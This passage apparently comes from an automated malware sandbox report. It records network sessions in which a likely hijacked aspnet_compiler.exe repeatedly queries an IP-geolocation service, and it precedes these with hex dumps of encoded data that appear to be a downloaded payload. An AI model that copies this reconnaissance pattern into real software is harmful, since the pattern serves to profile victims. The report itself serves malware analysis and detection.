                                                              2024-11-20 07:18:13 UTC1369INData Raw: ce ce cb 17 11 34 31 31 34 09 a9 cb ce ce 1e 23 31 34 26 1b 34 31 31 26 31 31 20 1b 31 34 31 32 04 39 31 30 31 31 34 31 31 34 31 31 34 31 1b 35 21 31 34 31 31 a1 31 b6 28 30 08 23 31 31 35 32 01 3c 31 35 34 31 31 34 31 31 34 31 31 20 1b 30 28 31 31 34 31 8f 34 79 37 35 08 26 34 31 30 36 31 40 35 ba cd 35 4d 31 34 31 31 27 01 32 34 35 31 34 31 31 34 31 31 34 31 31 1e 22 01 37 31 b1 34 31 31 35 31 31 25 19 fa 36 31 37 14 33 31 34 31 cf 3a 31 31 0c 31 31 34 31 cf 38 31 31 71 32 31 34 31 34 34 31 31 32 31 31 34 1e 31 34 31 09 34 31 31 34 1b 4f b6 33 31 30 19 ba 33 31 37 14 31 31 34 31 4f 52 33 31 30 4a 44 36 31 35 0e fa ce cb ce 17 14 31 31 34 31 09 f4 ce ce cb 4f b0 36 31 35 1c b6 36 34 37 11 35 31 31 34 4f 57 36 31 35 4f 52 33 34 35 08 96 ce ce cb 17 11 34
                                                              Data Ascii: 4114#14&411&11 141291011411411415!14111(0#1152<15411411411 0(11414y75&41061@55M1411'2451411411411"71411511%6173141:111141811q2141441121141414114O3103171141OR310JD6151141O6156475114OW615OR3454
                                                              2024-11-20 07:18:13 UTC1369INData Raw: 31 25 19 fa 36 31 37 14 33 31 34 31 cf 3a 31 31 0c 31 31 34 31 cf 38 31 31 71 32 31 34 31 66 34 31 31 1a 31 31 34 34 31 34 31 09 66 31 31 34 4f b0 36 31 35 1c b6 36 34 37 11 35 31 31 34 4f 57 36 31 35 4f 79 33 34 35 08 f8 ce ce cb 17 11 34 31 31 34 09 f0 cb ce ce 4a b3 33 34 35 19 bf 36 31 32 11 31 34 31 31 4a 57 33 34 35 4a 11 33 31 30 0b 92 cb ce ce 12 11 31 34 31 31 0c a9 ce cb ce 1b 26 31 31 23 1b 31 34 31 23 34 31 25 1e 31 31 34 32 01 3c 31 35 34 31 31 34 31 31 34 31 31 23 1b 70 28 31 31 34 31 31 34 90 31 34 31 72 36 31 31 d0 33 31 34 0b 31 34 31 2a 34 31 30 27 01 32 34 b1 31 34 31 30 34 31 20 1c fa 33 34 37 11 35 31 31 34 cf 3f 34 31 09 34 31 31 34 cf 3d 34 31 74 37 31 31 34 1f 31 34 31 34 34 31 31 63 31 31 34 09 18 34 31 31 4a b0 33 34 35 19 b3 36
                                                              Data Ascii: 1%6173141:111141811q2141f4111144141f114O6156475114OW615Oy3454114J3456121411JW345J3101411&11#141#41%1142<15411411411#p(114114141r611314141*410'24141041 3475114?414114=41t71141414411c114411J3456
                                                              2024-11-20 07:18:13 UTC1369INData Raw: 71 32 31 34 31 34 34 31 31 1b 31 31 34 37 31 34 31 09 34 31 31 34 1b 4f b5 33 31 30 19 b6 33 31 37 14 31 31 34 31 4f 52 33 31 30 4a 47 36 31 35 0d fa ce cb ce 17 14 30 31 34 31 09 f4 ce ce cb 4f b3 36 31 35 1c ba 36 34 37 11 34 31 31 34 4f 57 36 31 35 4f 2c 33 34 35 0b 96 ce ce cb 17 11 34 31 31 34 09 a6 cb ce ce 26 31 31 23 1b 31 34 31 23 34 31 25 1e 31 31 34 23 31 34 27 1b 34 31 31 27 01 32 34 b1 31 34 31 30 34 31 20 1c fa 33 34 37 11 35 31 31 34 cf 3f 34 31 09 34 31 31 34 cf 3d 34 31 74 37 31 31 34 34 31 34 31 1e 34 31 31 1a 31 31 34 09 31 34 31 31 4a b3 33 34 35 19 bf 36 31 32 11 33 34 31 31 4a 57 33 34 35 4a 31 33 31 30 0b fd cb ce ce 12 11 33 34 31 31 0c f0 ce cb ce 1b 4a b0 33 34 35 19 b3 36 31 32 11 31 34 31 31 4a 57 33 34 35 4a 11 33 31 30 0b 93
                                                              Data Ascii: q2141441111471414114O3103171141OR310JG6150141O6156474114OW615O,3454114&11#141#41%114#14'411'24141041 3475114?414114=41t711441414111141411J3456123411JW345J13103411J3456121411JW345J310
                                                              2024-11-20 07:18:13 UTC1369INData Raw: 31 31 34 31 01 34 31 31 46 33 31 34 93 33 34 31 08 34 31 31 23 31 31 35 22 01 37 31 35 34 31 31 34 31 31 34 31 31 34 1b 22 04 32 31 b4 31 31 34 30 31 34 20 19 ff 33 31 32 11 33 34 31 31 ca 3f 31 34 09 31 34 31 31 ca 3d 31 34 74 32 34 31 31 31 31 31 34 37 31 34 31 1e 34 31 31 0c 31 31 34 31 1b 4a b3 33 34 35 19 bf 36 31 32 11 31 34 31 31 4a 57 33 34 35 4a 0d 33 31 30 0b fa cb ce ce 12 11 31 34 31 31 0c f1 ce cb ce 4f b5 33 31 30 19 b6 33 31 37 14 30 31 34 31 4f 52 33 31 30 4a 6b 36 31 35 0e 93 ce cb ce 17 14 30 31 34 31 09 a3 ce ce cb 13 31 20 94 15 34 31 30 1e 31 31 34 32 01 3d 31 39 34 31 31 34 31 31 34 31 25 91 15 31 34 30 1b 26 31 31 23 1b 31 34 31 23 34 31 26 1e 31 31 34 23 31 34 25 1b 34 31 31 37 01 39 34 35 31 34 31 31 34 31 31 34 31 31 1e 70 2d 34
                                                              Data Ascii: 1141411F314341411#115"7154114114114"21114014 3123411?141411=14t2411111471414111141J3456121411JW345J3101411O3103170141OR310Jk61501411 4101142=1941141141%140&11#141#41&114#14%41179451411411411p-4


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.449740188.114.97.34437792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-20 07:19:01 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:01 UTC848INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:01 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51050
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0P18bdRJbFCrmik73R3bwnKkGp5LIMyzldpcRuTjQtV9YuH%2BzOm02pwadrSYdtaF38YivTZEGBKp%2FJ1R9Esuy4gKQsotVv5jiRQznWJD95a60TAJfshEowesE7gqCYevqlZiJMd"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab59d8246a52-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1696687&cwnd=205&unsent_bytes=0&cid=babbba150893012e&ts=231&x=0"
                                                              2024-11-20 07:19:01 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.449741188.114.97.34437792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-20 07:19:02 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-20 07:19:02 UTC852INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:02 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51051
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pL2zLdAjK%2BFx4sogOMuMkuqbnnMt7n3fppJUHm2Rqsk%2BsEfsVlvhJtRcmW19zsNJFDbmBz5QLWL8NLsXrOcYkNc99YZ3PCA%2BmUqGbqEaNdBDBbMMaUIP6jf%2BntsPkh6tCN2MHdMb"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab608957333c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2031&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1447694&cwnd=247&unsent_bytes=0&cid=3c8e9631adf34ee0&ts=160&x=0"
                                                              2024-11-20 07:19:02 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.449744188.114.97.34437792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-20 07:19:03 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-20 07:19:03 UTC850INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:03 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51052
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0qnE5qpJdRVDxKsz3b4EBmKwGYXq%2B6NmQpp6VJo3mRiTwLnAXf%2BQjXmZpUwcGXkILTMvjT5%2FWJYfdEiWhiHgYV5oZGyHYHVHmcpSKYGTx6wGzd4Iqw7WaNt25DgxhiRSouCuMrLy"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab686fc1c360-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1468&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=698&delivery_rate=1891191&cwnd=138&unsent_bytes=0&cid=db1a8002970e5105&ts=149&x=0"
                                                              2024-11-20 07:19:03 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.449752188.114.97.34437792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-20 07:19:05 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:05 UTC856INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:05 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51054
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDfqdZ7zIH7H7hhoACAujs6UA9Tpku9Kr4SV%2BjtHGxYecaVE7vwVOv93FEba9%2FjdsddBrBH%2FOG7kdgy1AdukAWo%2FgHglHOftjwJC%2Bd0PxpnlmyD3J8%2BeOInGh6R6Nl1vqTuB6vc1"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab714a4a5e76-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2116&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1400479&cwnd=221&unsent_bytes=0&cid=e2288ccb8e2f0ad8&ts=159&x=0"
                                                              2024-11-20 07:19:05 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.449764188.114.97.34437792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-20 07:19:06 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:06 UTC864INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:06 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51055
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2I%2FW%2B%2Fgif9r44zRBWt%2Fz%2BkeAtyKmUJbjymvhFABxd8lofH%2BSICHR5hzB%2FKCPRS201sHgRNccs3VFGMoSsCj%2Fti4nAdW%2FIm4ugmfiTLHWl7Lveq5vXxcO%2FwzjUQsAQQlv7EZSRt2F"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab7909db42f8-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1821584&cwnd=227&unsent_bytes=0&cid=cd8562c27dc3fd79&ts=136&x=0"
                                                              2024-11-20 07:19:06 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.449770188.114.97.34437792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-20 07:19:07 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:07 UTC860INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:07 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51056
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FAhgrQfxhTXnTdgHxb3icuqgS4czhMrLvTgE3l2C7lx%2BRzwFI%2BTi%2BEZyuGQVJuhsSu9la72ndwyGdw1qotsuEJPrsYcV0rZ41swI%2BMM%2BlMQm2vr5KZ62BhaxGqqCJZSwbm%2FNl%2FM9"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab81289f32fc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1993&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1454907&cwnd=240&unsent_bytes=0&cid=1b085f7eca3054dc&ts=153&x=0"
                                                              2024-11-20 07:19:07 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.449780188.114.97.34437792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-20 07:19:09 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:09 UTC852INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:09 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51058
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rAithFowAVojQ%2FXfFY4SeNqKXYkZE9yismJlhhstcDZXwrXQ9cr5%2FLm%2Fy1AjNhOxbIgKhBObD7AP2lroSBzEqs9ti7kYIBJm%2FyREFPYFoU50fgCFNBtNOXDPTV4dmetG0OrXjzLi"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab89aa91728a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2018&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1452013&cwnd=221&unsent_bytes=0&cid=bc85a5c206559d20&ts=261&x=0"
                                                              2024-11-20 07:19:09 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                              Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.449787188.114.97.34437792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-20 07:19:10 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:10 UTC858INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:10 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51059
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JnOyYbo%2FnNNEbriDvWNrMj7WzMB0QT9C958TIdjJ5eZBPMcqSMD2%2BRye%2BUMWAp8XfmOhLXQb%2B%2BVP5LcZACck8XTZ9%2FzPmL0vN1MK8RuJkAEy5RKuyILlRNIQy8qcaWon7WF%2FUCg2"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab921c446a5e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1803582&cwnd=198&unsent_bytes=0&cid=9f22c970522515ed&ts=154&x=0"
